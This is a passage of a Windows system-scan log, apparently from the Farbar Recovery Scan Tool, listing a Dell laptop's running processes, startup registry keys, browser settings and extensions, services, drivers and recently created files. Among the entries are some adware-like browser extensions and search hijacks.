(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.11\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.11\GoogleCrashHandler64.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Atheros) C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Qualcomm®Atheros®) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe
(Cisco) C:\Users\John\AppData\Local\DIRECTV Player\PCShowServerPMWrapper.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
(Creative Technology Ltd) C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe
(IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(IObit) C:\Program Files (x86)\IObit\Advanced SystemCare 8\ASCTray.exe
(Dell Products, LP.) C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Toaster.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\DBRUpdate\DBRUpd.exe
() C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRCrawler.exe
() C:\Users\John\AppData\Local\DIRECTV Player\NDSPCShowServer.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7202520 2013-08-19] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321688 2013-08-07] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_PushButton] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321688 2013-08-07] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2774256 2013-08-12] (Synaptics Incorporated)
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [5774664 2013-09-10] (Dell Inc.)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [286056 2013-07-15] (Intel Corporation)
HKLM\...\Run: [WavesSvc] => C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe [562264 2014-07-17] (Waves Audio Ltd.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2014-12-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [673616 2009-04-07] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [Dell Webcam Central] => C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe [409744 2009-06-24] (Creative Technology Ltd)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [IObit Malware Fighter] => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [1802048 2014-10-13] (IObit)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe [132736 2013-07-02] ( (Qualcomm®Atheros®))
HKU\S-1-5-21-1973512931-3336358897-1288466322-1001\...\Run: [PCShowServer] => C:\Users\John\AppData\Local\DIRECTV Player\PCShowServerPMWrapper.exe [1631088 2014-09-16] (Cisco)
HKU\S-1-5-18\...\Run: [Advanced SystemCare 8] => C:\Program Files (x86)\IObit\Advanced SystemCare 8\ASCTray.exe [2427680 2014-12-10] (IObit)
ShellIconOverlayIdentifiers: [DBARFileBackuped] -> {831cebdd-6baf-4432-be76-9e0989c14aef} => C:\Windows\system32\mscoree.dll (Microsoft Corporation)
ShellIconOverlayIdentifiers: [DBARFileNotBackuped] -> {275e4fd7-21ef-45cf-a836-832e5d2cc1b3} => C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-1973512931-3336358897-1288466322-1001\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.wundergro...w:55304.2.99999
SearchScopes: HKLM -> DefaultScope {843F8246-B4D3-436E-993C-E683694E7048} URL = http://start.mysearc...cr=20185727&ir=
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {843F8246-B4D3-436E-993C-E683694E7048} URL = http://start.mysearc...cr=20185727&ir=
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1973512931-3336358897-1288466322-1001 -> DefaultScope {BDF61FAE-9D19-40F0-8F34-688DEB334CA9} URL = http://www.bing.com/...rc=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1973512931-3336358897-1288466322-1001 -> E2170BFC38574C29915A1E2A25F2714A URL = http://securedsearch...q={searchTerms}
SearchScopes: HKU\S-1-5-21-1973512931-3336358897-1288466322-1001 -> {843F8246-B4D3-436E-993C-E683694E7048} URL =
SearchScopes: HKU\S-1-5-21-1973512931-3336358897-1288466322-1001 -> {BDF61FAE-9D19-40F0-8F34-688DEB334CA9} URL = http://www.bing.com/...rc=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1973512931-3336358897-1288466322-1001 -> {E3480582-FBAB-47BD-B586-87BA7FDCE2BD} URL = http://search.yahoo....p={searchTerms}
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll (IObit)
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll (Qualcomm®Atheros®)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Ads Removal -> {9D974C8C-6D92-44FB-BEAF-B45A1C0CF17F} -> C:\Program Files (x86)\IObit\IObit Malware Fighter\adsremoval\IE\Adblock.dll (Adblock)
BHO-x32: Advanced SystemCare Surfing Protection -> {BA0C978D-D909-49B6-AFE2-8BDE245DC7E6} -> C:\Program Files (x86)\IObit\Surfing Protection\BrowerProtect\ASCPlugin_Protection.dll (IObit)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420
FF NewTab: hxxp://securedsearch.lavasoft.com/?pr=vmn&id=webcompa&ent=hp_WCYID10088_cnet_141226
FF DefaultSearchEngine: Google
FF SelectedSearchEngine: Ad-Aware SecureSearch
FF Homepage: hxxp://www.wunderground.com/cgi-bin/findweather/getForecast?query=zmw:55304.2.99999
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_16_0_0_235.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_235.dll ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=3.5.29 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1973512931-3336358897-1288466322-1001: @nds.com/PlayerPlugin -> C:\Users\John\AppData\Local\DIRECTV Player\npPlayerPlugin.dll (Cisco)
FF Plugin HKU\S-1-5-21-1973512931-3336358897-1288466322-1001: @nds.com/PlayerPlugin64 -> C:\Users\John\AppData\Local\DIRECTV Player\win64\npPlayerPlugin64.dll (Cisco)
FF Plugin HKU\S-1-5-21-1973512931-3336358897-1288466322-1001: NDS.com/PlayerPlugin -> C:\Users\John\AppData\Local\DIRECTV Player\npPlayerPlugin.dll (Cisco)
FF user.js: detected! => C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\user.js
FF SearchPlugin: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\searchplugins\securesearch.xml
FF Extension: YoutuubeAdBllooCke - C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\Extensions\[email protected] [2014-12-16]
FF Extension: Ads Removal - C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\Extensions\[email protected] [2014-12-14]
FF Extension: Xmarks - C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\Extensions\[email protected] [2014-11-23]
FF Extension: Advanced SystemCare Surfing Protection - C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\Extensions\[email protected] [2015-01-02]

Chrome:
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR Profile: C:\Users\John\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-11-05]
CHR Extension: (Free Visio Viewer) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcpmofnlkemfkhgngcdppgbhncoflmpe [2014-12-16]
CHR Extension: (Advanced SystemCare Surfing Protection) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nfengeggddojhakldhlpjdlddgkkjkdd [2014-04-09]
CHR Extension: (Google Wallet) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-11-04]
CHR Extension: (BuyNSAve) - C:\ProgramData\lbihihaaofomgcababbmjgbblobipmib\ [2014-11-04]
CHR HKLM-x32\...\Chrome\Extension: [nfengeggddojhakldhlpjdlddgkkjkdd] - C:\Program Files (x86)\IObit\Surfing Protection\BrowerProtect\ASC_GhromePlugin.crx [2014-01-13]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdvancedSystemCareService8; C:\Program Files (x86)\IObit\Advanced SystemCare 8\ASCService.exe [815392 2014-11-04] (IObit)
R2 AtherosSvc; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\adminservice.exe [312448 2013-07-02] (Windows ® Win 7 DDK provider)
R2 CouponPrinterService; C:\Program Files (x86)\Coupons\CouponPrinterService.exe [179184 2014-10-15] (Coupons.com Inc.)
R2 EpsonBidirectionalService; C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSVC.exe [94208 2006-12-19] (SEIKO EPSON CORPORATION) [File not signed]
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [14696 2013-07-15] (Intel Corporation)
R2 IMFservice; C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe [344896 2014-09-30] (IObit)
R2 Intel® Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [733696 2013-05-11] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [822232 2013-05-11] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-06-01] (Intel Corporation)
S2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2631456 2015-01-02] (IObit)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [246488 2013-06-18] (Realtek Semiconductor)
R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe [1915480 2013-05-23] (SoftThinks SAS)
R2 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [81536 2013-06-21] (Atheros)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 BTATH_LWFLT; C:\Windows\System32\DRIVERS\btath_lwflt.sys [77464 2013-07-02] (Qualcomm Atheros)
R3 FileMonitor; C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win7_amd64\FileMonitor.sys [23048 2013-03-23] (IObit)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2013-07-11] (Intel Corporation)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2015-01-03] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [118272 2014-12-26] (Intel Corporation)
R3 RegFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys [34848 2013-11-19] (IObit.com)
R0 SmartDefragDriver; C:\Windows\System32\Drivers\SmartDefragDriver.sys [21184 2014-06-04] (IObit)
S3 SmbDrv; C:\Windows\system32\drivers\Smb_driver_AMDASF.sys [30448 2013-08-12] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [34544 2013-08-12] (Synaptics Incorporated)
R3 UrlFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\UrlFilter.sys [23016 2013-11-19] (IObit.com)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-05 13:14 - 2015-01-05 13:14 - 00018617 _____ () C:\Users\John\Desktop\FRST.txt
2015-01-05 13:12 - 2015-01-05 13:12 - 02123776 _____ (Farbar) C:\Users\John\Desktop\FRST64.exe
2015-01-05 11:45 - 2015-01-05 11:45 - 00000000 ___RD () C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2015-01-05 10:47 - 2015-01-05 11:44 - 00000112 _____ () C:\Windows\setupact.log
2015-01-05 10:47 - 2015-01-05 10:47 - 00000000 _____ () C:\Windows\setuperr.log
2015-01-05 10:46 - 2015-01-05 10:46 - 00007600 _____ () C:\Windows\PFRO.log
2015-01-04 22:49 - 2015-01-04 22:49 - 00000031 _____ () C:\Users\John\Documents\direct.txt
2015-01-02 11:08 - 2015-01-02 11:08 - 00002852 _____ () C:\Windows\System32\Tasks\ASC8_SkipUac_John
2015-01-02 11:07 - 2015-01-02 11:07 - 00002892 _____ () C:\Windows\System32\Tasks\Uninstaller_SkipUac_John
2015-01-02 11:07 - 2015-01-02 11:07 - 00001182 _____ () C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Uninstall Programs.lnk
2015-01-02 11:07 - 2015-01-02 11:07 - 00000000 ____D () C:\ProgramData\{BAF091CA-86C4-4627-ADA1-897E2621C1B0}
2015-01-02 11:06 - 2015-01-02 11:14 - 00002111 _____ () C:\Users\Public\Desktop\Advanced SystemCare 8.lnk
2015-01-02 11:06 - 2015-01-02 11:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced SystemCare 8
2014-12-29 17:34 - 2014-12-29 17:34 - 00001165 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2014-12-29 17:34 - 2014-12-29 17:34 - 00001153 _____ () C:\Users\Public\Desktop\Mozilla Firefox.lnk
2014-12-29 17:34 - 2014-12-29 17:34 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-12-29 17:34 - 2014-12-29 17:34 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-12-28 13:51 - 2014-12-28 13:51 - 00000000 __SHD () C:\Users\John\AppData\Local\EmieUserList
2014-12-28 13:51 - 2014-12-28 13:51 - 00000000 __SHD () C:\Users\John\AppData\Local\EmieSiteList
2014-12-28 13:51 - 2014-12-28 13:51 - 00000000 __SHD () C:\Users\John\AppData\Local\EmieBrowserModeList
2014-12-28 13:37 - 2014-12-28 13:39 - 58082952 _____ (Microsoft Corporation) C:\Users\John\Desktop\Explorer.EXE
2014-12-28 13:36 - 2014-12-28 13:36 - 00001419 _____ () C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-12-26 23:13 - 2014-12-28 13:46 - 00000000 ___HD () C:\Windows\msdownld.tmp
2014-12-26 15:08 - 2014-12-26 15:08 - 02077392 _____ (Microsoft Corporation) C:\Users\John\Downloads\7A2E.tmp
2014-12-26 14:28 - 2015-01-05 13:14 - 00000000 ____D () C:\FRST
2014-12-26 12:14 - 2014-12-26 12:14 - 00000000 ____D () C:\Users\John\AppData\Roaming\LavasoftStatistics
2014-12-26 12:13 - 2014-12-26 12:13 - 00004720 _____ () C:\Windows\SysWOW64\LavasoftTcpService.ini
2014-12-26 12:13 - 2014-12-26 12:13 - 00002552 _____ () C:\Windows\SysWOW64\LavasoftTcpServiceOff.ini
2014-12-26 12:13 - 2014-12-26 12:13 - 00002552 _____ () C:\Windows\system32\LavasoftTcpServiceOff.ini
2014-12-26 12:13 - 2014-12-16 12:10 - 00358736 _____ (Lavasoft Limited) C:\Windows\system32\LavasoftTcpService64.dll
2014-12-26 12:13 - 2014-12-16 12:10 - 00312424 _____ (Lavasoft Limited) C:\Windows\SysWOW64\LavasoftTcpService.dll
2014-12-26 12:08 - 2014-12-26 12:08 - 01924232 _____ () C:\Users\John\Downloads\Adaware_Installer.exe
2014-12-26 10:59 - 2014-12-26 10:59 - 09890008 _____ (Realtek Semiconductor Corp.) C:\Windows\SysWOW64\RsCRIcon.dll
2014-12-26 10:59 - 2014-12-26 10:59 - 00941784 _____ (Realtek ) C:\Windows\system32\Drivers\Rt64win7.sys
2014-12-26 10:59 - 2014-12-26 10:59 - 00331992 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\Drivers\RtsUVStor.sys
2014-12-26 10:59 - 2014-12-26 10:59 - 00073800 _____ (Realtek Semiconductor Corporation) C:\Windows\system32\RtNicProp64.dll
2014-12-26 10:58 - 2014-12-26 10:58 - 00118272 _____ (Intel Corporation) C:\Windows\system32\Drivers\TeeDriverx64.sys
2014-12-26 10:53 - 2014-12-26 10:53 - 00003164 _____ () C:\Windows\System32\Tasks\SmartDefrag3_Startup
2014-12-26 10:53 - 2014-12-26 10:53 - 00003162 _____ () C:\Windows\System32\Tasks\SmartDefrag3_Update
2014-12-26 10:52 - 2014-12-26 10:52 - 00003156 _____ () C:\Windows\System32\Tasks\Driver Booster Update
2014-12-26 10:52 - 2014-12-26 10:52 - 00000000 ____D () C:\Windows\Tasks\ImCleanDisabled
2014-12-26 10:52 - 2014-12-26 10:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Driver Booster 2
2014-12-24 17:50 - 2014-12-24 17:50 - 00000263 _____ () C:\Users\John\Desktop\Dropbox - Natalie.URL
2014-12-19 13:10 - 2014-12-26 19:17 - 00000000 ____D () C:\Users\John\AppData\Roaming\Octoshape
2014-12-19 13:10 - 2014-12-19 13:10 - 00000000 ____D () C:\Users\John\AppData\Local\DIRECTV Player
2014-12-19 13:09 - 2014-12-19 13:09 - 20367968 _____ (DIRECTV) C:\Users\John\Downloads\DIRECTV_Player_11.0.exe
2014-12-17 19:57 - 2015-01-03 17:40 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-12-17 19:57 - 2014-12-17 19:57 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-12-17 19:57 - 2014-12-17 19:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-12-17 19:57 - 2014-12-17 19:57 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-12-17 19:57 - 2014-11-21 06:14 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-12-17 19:57 - 2014-11-21 06:14 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-12-17 19:57 - 2014-11-21 06:14 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-12-17 19:56 - 2014-12-17 19:56 - 20447072 _____ (Malwarebytes Corporation ) C:\Users\John\Downloads\mbam-setup-2.0.4.1028.exe
2014-12-17 12:05 - 2014-12-12 23:09 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-12-17 12:05 - 2014-12-12 21:33 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-12-16 15:48 - 2014-12-16 15:48 - 00000000 ____D () C:\Users\John\AppData\Local\Skype
2014-12-16 15:43 - 2014-12-16 15:45 - 44840544 _____ (Skype Technologies S.A.) C:\Users\John\Downloads\SkypeSetupFull.exe
2014-12-16 12:13 - 2014-12-26 11:27 - 00000000 ____D () C:\Program Files (x86)\YoutuubeAdBllooCke
2014-12-16 12:13 - 2014-12-26 11:27 - 00000000 ____D () C:\Program Files (x86)\Free Visio Viewer
2014-12-16 12:12 - 2014-12-16 12:12 - 00000000 ____D () C:\ProgramData\lbihihaaofomgcababbmjgbblobipmib
2014-12-16 12:12 - 2014-12-16 12:12 - 00000000 ____D () C:\ProgramData\15431041915562449580
2014-12-16 11:54 - 2014-12-16 11:54 - 02978677 _____ (Vimm's Lair - vimm.net) C:\Users\John\Downloads\FCEUX_2.2.2.exe
2014-12-16 11:51 - 2014-12-16 11:51 - 00455842 _____ (Vimm's Lair - vimm.net) C:\Users\John\Downloads\Jnes_1.1.1.exe
2014-12-16 11:48 - 2014-12-16 11:48 - 01201037 _____ (Vimm's Lair - vimm.net) C:\Users\John\Downloads\RockNES_5.13d.exe
2014-12-14 03:23 - 2014-12-14 03:23 - 00000000 ____D () C:\Program Files (x86)\Dell Digital Delivery
2014-12-11 22:07 - 2014-12-17 20:11 - 00000000 ____D () C:\Program Files (x86)\Application Updater
2014-12-11 22:07 - 2014-12-17 20:10 - 00000000 ____D () C:\Program Files (x86)\IObit Apps Toolbar
2014-12-11 03:02 - 2014-10-17 20:05 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-12-11 03:02 - 2014-10-17 19:33 - 03209728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-12-10 11:28 - 2014-11-26 19:43 - 00389296 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-12-10 11:28 - 2014-11-26 19:10 - 00342200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-12-10 11:28 - 2014-11-21 21:13 - 25059840 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-12-10 11:28 - 2014-11-21 21:06 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-12-10 11:28 - 2014-11-21 21:06 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-12-10 11:28 - 2014-11-21 20:50 - 00580096 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-12-10 11:28 - 2014-11-21 20:50 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-12-10 11:28 - 2014-11-21 20:49 - 02885120 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-12-10 11:28 - 2014-11-21 20:49 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-12-10 11:28 - 2014-11-21 20:48 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-12-10 11:28 - 2014-11-21 20:41 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-12-10 11:28 - 2014-11-21 20:40 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-12-10 11:28 - 2014-11-21 20:37 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-12-10 11:28 - 2014-11-21 20:35 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-12-10 11:28 - 2014-11-21 20:34 - 06039552 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-12-10 11:28 - 2014-11-21 20:34 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-12-10 11:28 - 2014-11-21 20:26 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-12-10 11:28 - 2014-11-21 20:22 - 19749376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-12-10 11:28 - 2014-11-21 20:22 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-12-10 11:28 - 2014-11-21 20:20 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-12-10 11:28 - 2014-11-21 20:14 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-12-10 11:28 - 2014-11-21 20:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-12-10 11:28 - 2014-11-21 20:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
